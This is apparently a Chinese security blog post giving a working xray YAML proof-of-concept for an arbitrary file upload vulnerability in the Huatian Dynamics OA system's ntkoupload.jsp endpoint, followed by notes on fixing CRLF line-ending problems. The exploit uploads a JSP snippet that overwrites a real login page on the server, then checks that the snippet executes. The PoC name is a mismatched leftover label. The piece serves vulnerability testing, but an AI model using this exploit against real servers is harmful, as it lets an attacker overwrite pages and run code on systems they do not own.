华天动力协同办公系统 ntkoupload 任意文件上传漏洞
刚开始的写法是这样的, 但是发现了xray存在一个问题
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
| name: poc-yaml-ruijie-eg-cli-rce
manual: true
transport: http
set:
r1: randomInt(8000, 10000)
r2: randomInt(8000, 10000)
rules:
r0:
request:
cache: true
method: POST
path: /OAapp/htpages/app/module/trace/component/fileEdit/ntkoupload.jsp
headers:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzRSYXfFlXqk6btQm
Accept-Encoding: gzip
body: |
------WebKitFormBoundaryzRSYXfFlXqk6btQm
Content-Disposition: form-data; name="EDITFILE"; filename="xxx.txt"
Content-Type: image/png
<%out.print("111");%>
------WebKitFormBoundaryzRSYXfFlXqk6btQm
Content-Disposition: form-data; name="newFileName"
D:/htoa/Tomcat/webapps/OAapp/htpages/app/module/login/normalLoginPageForOther.jsp
------WebKitFormBoundaryzRSYXfFlXqk6btQm--
expression: response.status == 200
r1:
request:
cache: true
method: GET
path: /OAapp/htpages/app/module/login/normalLoginPageForOther.jsp
headers:
Content-Type: application/x-www-form-urlencoded
expression: response.status == 200 && response.body.bcontains(bytes("111"))
expression: r0() && r1()
detail:
author: whale3070
links:
- https:
|
这个洞一定要用windows的换行符,CRLF
而且为啥headers是\r\n
post data却是\n呢
这可以认为是xray的缺陷
我在poc里用了windows换行符,在kali里面用xray发包,会被强制转行为linux换行符
| "------WebKitFormBoundaryzRSYXfFlXqk6btQm\r\nContent-Disposition: form-data; name=\"EDITFILE\"; filename=\"xxx.txt\"\r\nContent-Type: image/png\r\n\r\n<%out.print(\"tested1\");%>\r\n------WebKitFormBoundaryzRSYXfFlXqk6btQm\r\nContent-Disposition: form-data; name=\"newFileName\"\r\n\r\nD:/htoa/Tomcat/webapps/OAapp/htpages/app/module/login/normalLoginPageForOther.jsp\r\n------WebKitFormBoundaryzRSYXfFlXqk6btQm--"
|
最后将body部分改成这样,成功解决
虽然说起来很简单,但是排错花了半天到一天时间